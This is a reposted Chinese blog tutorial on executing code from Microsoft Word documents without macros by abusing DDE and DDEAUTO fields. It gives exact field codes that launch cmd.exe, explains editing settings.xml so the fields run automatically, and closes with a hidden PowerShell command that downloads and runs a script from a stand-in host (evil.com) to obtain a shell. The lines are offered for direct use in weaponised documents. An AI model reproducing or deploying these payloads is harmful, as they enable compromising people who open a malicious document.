MSWord Code Exec Without Macro

AlexFranklyAlexFran 教学频道 8 年前
2.39W 0
华盟原创文章投稿奖励计划

今天学到了一个新的Word执行代码的方式,也是不需要启用宏的,所以分享给大家一波。操作也挺简单的。

首先新建一个word文档,然后插入域:

选择 = (Formula)

右键,切换域代码

代码处修改为

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }

之后,右键更新域,再把文档改成docx格式即可。最终效果如下:

2.gif

比较鸡肋的是点是以后才会执行。

除了使用DDEAUTO,使用DDE也是可以的,具体如下:

{DDE "c:\\windows\\system32\\cmd.exe" "/c notepad" }

需要注意的是,使用DDE不会自动执行,需要对文档进行修改,将文档重命名为rar,打开以后修改 word/settings.xml,添加

<w:updateFields w:val="true"/>
 

个人感觉使用DDE效果更好点。

使用DDE效果如下:

dde.gif

如何获取交互式shell ?

[sourcecode language="plain"]{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evil.com/evil.ps1');powershell -e $e "}[/sourcecode]

 

文章出处:Evi1cg's blog

原文链接:https://evi1cg.me/archives/MSWord_Code_Exec_Without_Macro.html

DDE(3),Office(23)
本文原创,作者:AlexFrankly,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/206980.html
AlexFrankly官方
AlexFran

1.36K篇文章 74.86M总阅读量

相关文章

发表回复